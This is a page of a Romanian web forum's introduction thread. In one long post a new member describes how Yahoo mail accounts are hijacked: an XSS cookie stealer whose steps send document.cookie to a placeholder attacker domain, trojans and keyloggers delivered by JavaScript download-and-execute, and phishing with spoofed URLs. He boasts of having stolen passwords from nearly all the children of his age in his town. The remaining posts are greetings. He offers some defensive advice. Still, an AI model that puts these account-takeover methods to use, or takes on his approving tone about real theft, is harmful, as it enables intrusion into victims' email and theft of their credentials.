Pagina 2 din 3 PrimulPrimul 123 UltimulUltimul
Rezultate 11 la 20 din 25

Subiect: joaffx

  1. #11
    Avatarul lui Joaffx
    Joaffx este deconectat Junior SeoPedia
    Reputatie:
    0
    Data înscrierii
    19th June 2008
    Posturi
    9
    Putere Rep
    0

    Implicit

    Multumesc de primirea calduroasa !

    Citat Postat în original de mike_ppc Vezi Post
    Bine ai venit, Ionut si felicitari pentru prezentare!
    Ca sa mai invat si eu ceva: Cum poti sa "lasi pe cineva fara parola" in yahoo - (in afara de situatia cand ghicesti datele lui si raspunsul la intrebarea secreta) ?
    Intrebarea ta este atat de complexa incat o poti compara cu o intrebare de genul "cum pot sa imi fac o casa repede" .
    In primul rand nu este etic sa schimbi o parola, nici in randul "intunecatilor" nu se mai practica asta , majoritatea doar spioneaza .

    Sper ca m-ai intrebat ca sa te protejezi . Ok , voi prezenta strict metodele cele mai folosite/cunoscute de catre marea masa a utilizatorilor "intunecati".

    1.Cookie Stealing.
    -ce este un cookie ? Un cookie se obtine atunci cand pe pagina de login de la yahoo introduci un username si o parola , cookieul este generat pentru a iti usura tie ( utilizatorul mailului ) navigatia , pentru a nu fi nevoit sa iti introduci parola la fiecare miscare din mail.
    In cazul Yahoo , cookieul in mod normal dureaza 24 de ore insa poate fi prelungit si la 2 saptamanii ( metoda privata ).
    -cum poate fi furat un cookie ? Un cookie poate fi furat destul de usor , tot ce ai nevoie este un script php si o vulnerabilitate XSS [ Cross Site Scripting ] , aceste vulnerabilitati se gasesc destul de usor in domeniile Yahoo daca stii sa cauti.
    In cazul Yahoo , cookieul este acelasi indiferent de domeniu ca e de China,Italia etc.
    - cum functioneaza metoda in pratica ?
    Metoda consta intr-un script php ( cookie stealer ) care primeste prin intermediul XSS`ului care devine un fel de "tunel" cookieurile utilizatorilor si pe care le stocheaza intr-un fisier de regula .txt
    Odata ce sunt colectate aceste cookieuri ele pot fi folosite pentru a accesa mailul ( victimei ) si webmessengerul acestuia.
    Am sa iti descriu in 5 pasi cum opereaza un atacator pentru a fura un cookie.
    a) Isi urca pe internet un script php pentru a colecta cookieurile ex atacator_domeniu . com /script_php?cookie=document.cookie
    b) Editeaza XSSul in functie de locatia cookie stealerului sau adica :
    yahoo . com /pagina?param=XSS(url_cookie_stealer
    c) Trimite victimei urlul din Yahoo cu XSS si asteapta ca prada sa cada in capcana
    d) Cazurile cand utilizatorul poate devenii prada :
    - s-a autentificat pe o pagina yahoo in ultimele 24 de ore si foloseste un browser care pastreaza sesiunea activa. In acest caz este destul de usor de furat , poate fi furat chiar si printr`un iframe
    - a intrat pe link`ul capcana din interiorul mailului ( propriu )
    e) Atacatorul a obtinut cookieul iar acum se plimba pe la tine prin mail

    Metoda aceasta este destul de folosita in ziua de azi , pentru protectie recomand :
    - sa dati Sign Out din mail dupa ce ati termiant de citit
    - optional sa folositi un addon care blocheaza javascript , eu folosesc NoScript
    - sa nu va puneti rau cu persoanele care sunt capabile de a va face rau . E mai bine sa previi decat sa tratezi

    Din cate stiu cookieul generat contine in interiorul sau parola insa algoritmul folosit nu il cunosc , probabil ca exista persoane care pot sa decripteze parola din cookie insa cu siguranta metoda este privata .

    2. Trojani/Keyloggere

    Asta e metoda clasica,urata,plictisitoare .. nu imi place sa vorbesc despre ea.
    Dar este o metoda destul de eficace uneori. Imi aduc aminte ca acum aproximativ 9 luni cu ajutorul unui trojan nedetectabil facut de o persoana reusisem sa capat idurile si parolele la aproape toti copii de varsta mea din oras. ( e un oras cu 20 de mii loc. )
    Metoda asta este destul de greu de pus in pratica. Insa atentie , ea poate devenii foarte periculoasa daca :
    - trojanul/keyloggerul este nedetectabil
    - utilizatorul are cunostinte de JavaScript avansate si poate scrie un o aplicate care sa faca auto download/execute adica sa intri pe site . com / pagina
    Iar codul JS sa downloadeze la tine in PC aplicatia si sa o execute . Cu metoda asta stiu ca ma distram cu utilizatorii de pe mirc.

    3. Scam
    Metoda asta e prea plictisitoare , in general e este folosita si de baietii care fac phishing ( cei care fura carduri pe la TV ).
    Uneori poate fi si aceasta o metoda periculoasa , de exemplu atacatorul poate face url spoofing si tie sa iti apara mail . yahoo . com cand tu de fapt sa fii pe un domeniu te_am_furat . com / scam

    Sper ca developerii vor intelege cat de important este sa iti filtrezi datele intr`o aplicatie si cat de periculoasa poate fi o vulnerabilitate XSS.

    Cam acestea ar fi , metodele cele mai folosite.

    Metode mai sunt insa cu siguranta private .

  2. #12
    Avatarul lui Nica Cristian
    Nica Cristian este deconectat Membru SeoPedia
    Reputatie:
    36
    Data înscrierii
    23rd May 2007
    Locaţie
    Bucharest
    Vârstă
    37
    Posturi
    654
    Putere Rep
    36

    Implicit

    Mai sa fiu al naibi...

  3. #13
    Avatarul lui Danielu
    Danielu este deconectat Membru SeoPedia
    Reputatie:
    35
    Data înscrierii
    22nd April 2008
    Locaţie
    Bucuresti
    Vârstă
    40
    Posturi
    572
    Putere Rep
    35

    Implicit

    Salutari speciale de la mine, fiind din acelasi oras, sunt mandru ca apar astfel de pusti si pe acolo. Multa bafta in continuare !
    Retete de prajituri pentru toate gusturile -> Retete prajituri

  4. #14
    Avatarul lui Otto
    Otto este deconectat Membru SeoPedia
    Reputatie:
    34
    Data înscrierii
    10th February 2008
    Locaţie
    Slobozia
    Vârstă
    35
    Posturi
    50
    Putere Rep
    34

    Implicit

    bine ai venit

  5. #15
    Avatarul lui startblog
    startblog este deconectat Membru SeoPedia
    Reputatie:
    34
    Data înscrierii
    22nd December 2007
    Locaţie
    Constanta, Romania
    Posturi
    297
    Putere Rep
    34

    Implicit

    Asta suna a copy paste. In fine, eu nu inteleg ce ai inteles tu daca ai invatat php fara nici o cunostinta html. Bine ai venit oriucm.

  6. #16
    Avatarul lui Joaffx
    Joaffx este deconectat Junior SeoPedia
    Reputatie:
    0
    Data înscrierii
    19th June 2008
    Posturi
    9
    Putere Rep
    0

    Implicit

    Citat Postat în original de startblog Vezi Post
    Asta suna a copy paste. In fine, eu nu inteleg ce ai inteles tu daca ai invatat php fara nici o cunostinta html. Bine ai venit oriucm.
    Copy paste ? Tot ce e scris mai sus e scris de mine de la prima litera pana la ultima !

    Cum ai ajuns la concluzia ca nu am nicio cunostinta de html ?

    Apropo , vezi ca dupa noul DOOM nici-o se scrie legat !

    As prefera sa imi aduci argumente pentru afirmatiile pe care le-ai facut mai sus , asta daca nu obisnuiesti sa vorbesti fara sens.

    Bafta,

  7. #17
    Avatarul lui startblog
    startblog este deconectat Membru SeoPedia
    Reputatie:
    34
    Data înscrierii
    22nd December 2007
    Locaţie
    Constanta, Romania
    Posturi
    297
    Putere Rep
    34

    Implicit

    Atunci felicitarile mele daca e scris de tine , am zis doar ca "suna", poti sa o iei si ca pe un compliment. Ai zis chiar in primul post "PHP-ul a fost primul meu "prieten""
    Salut, tine-o tot asa.
    PS: Nu ma conformez noului DOOM.

  8. #18
    Avatarul lui johnyk_vl
    johnyk_vl este deconectat Membru SeoPedia
    Reputatie:
    34
    Data înscrierii
    6th February 2008
    Locaţie
    Ramnicu Valcea
    Posturi
    312
    Putere Rep
    34

    Implicit

    Bine ai venit.
    E-imbracaminte.ro Magazin Online de Imbracaminte si Articole Vestimentare
    Falkun.net Site Prezentare Firma Web Development si Internet Marketing

  9. #19
    Avatarul lui mike_ppc
    mike_ppc este deconectat Ambasador
    Reputatie:
    37
    Data înscrierii
    7th September 2007
    Locaţie
    Bucuresti
    Vârstă
    50
    Posturi
    839
    Putere Rep
    37

    Implicit

    Mi s-a zbarlit parul cand am vazut cam ce se poate face. Eu am preluat expresia "sa lasi pe cineva fara parola" de la tine, si eram curios cum se poate face asta ca idee. Au ajuns departe lucrurile...

  10. #20
    Avatarul lui Joaffx
    Joaffx este deconectat Junior SeoPedia
    Reputatie:
    0
    Data înscrierii
    19th June 2008
    Posturi
    9
    Putere Rep
    0

    Implicit

    Citat Postat în original de mike_ppc Vezi Post
    Mi s-a zbarlit parul cand am vazut cam ce se poate face. Eu am preluat expresia "sa lasi pe cineva fara parola" de la tine, si eram curios cum se poate face asta ca idee. Au ajuns departe lucrurile...
    Intradevar , s-au schimbat multe lucruri insa "jocul" va devenii mult mai frumos cand Web 2.0 va fi implementat in majoritatea siteurilor .Personal astept sa fie implementat de catre edu.ro .
    Oricum , ceea ce am zis mai sus este doar varful iceberg-ului sau mai bine spus doar ceea ce este folosit la tot pasul si are acces toata lumea la aceste tehnici deoarece nu necesita cunostinte avansate despre securitate/programare si pot fi folosite de un numar mare de persoane.
    Problema este ca din pacate securitatea in afara de placere nu prea ofera nimic iar mancarea,hainele nu se pot cumpara cu placere .

Pagina 2 din 3 PrimulPrimul 123 UltimulUltimul

Informații subiect

Utilizatori care navighează în acest subiect

Momentan este/sunt 1 utilizator(i) care navighează în acest subiect. (0 membrii și 1 vizitatori)

Permisiuni postare

  • Nu puteţi posta subiecte noi.
  • Nu puteţi răspunde la subiecte
  • Nu puteţi adăuga ataşamente
  • Nu puteţi modifica posturile proprii
  •